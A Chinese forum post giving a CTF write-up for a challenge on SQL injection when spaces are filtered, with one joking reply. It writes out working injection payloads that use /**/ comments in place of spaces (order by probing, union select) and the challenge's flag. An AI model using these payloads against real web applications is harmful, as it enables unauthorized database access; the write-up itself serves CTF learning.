首页
社区
课程
招聘
[原创]二十一丶你的空格哪去了 writeup
发表于: 2020-9-3 19:53 736

[原创]二十一丶你的空格哪去了 writeup

2020-9-3 19:53
736

你的空格哪去了

简单的查询代码

输入1

输入2

提示hacker!

可能过滤的’ 或者 and等

没有提示hacker 说明没有过滤单引号

根据标题发现可能过滤了空格

尝试and后也没有过滤and

 

首先1’order/**/by/**/5#

发现没有信息

再尝试1’order/**/by/**/3#

然后使用-1’union/**/select/**/1,2,3#

然后看到我才会告诉你可以用select flag from flag看到Flag尝试payload:

-1'union/**/select/**/1,2,flag/**/from/**/flag#

Flag: flag{63564494cac7097c}

Blog:https://blog.catgames.cn

别问我为什么一下跳到二十一 因为前面还没做完!!!!!!!!!!!!


[课程]Android-CTF解题方法汇总!

最后于 2020-9-3 20:17 被UzJu编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 64
活跃值: (58)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
有的人题目那么明显做不出来,而我不一样,我题目都没看到
2020-11-23 17:47
0
游客
登录 | 注册 方可回帖
返回
//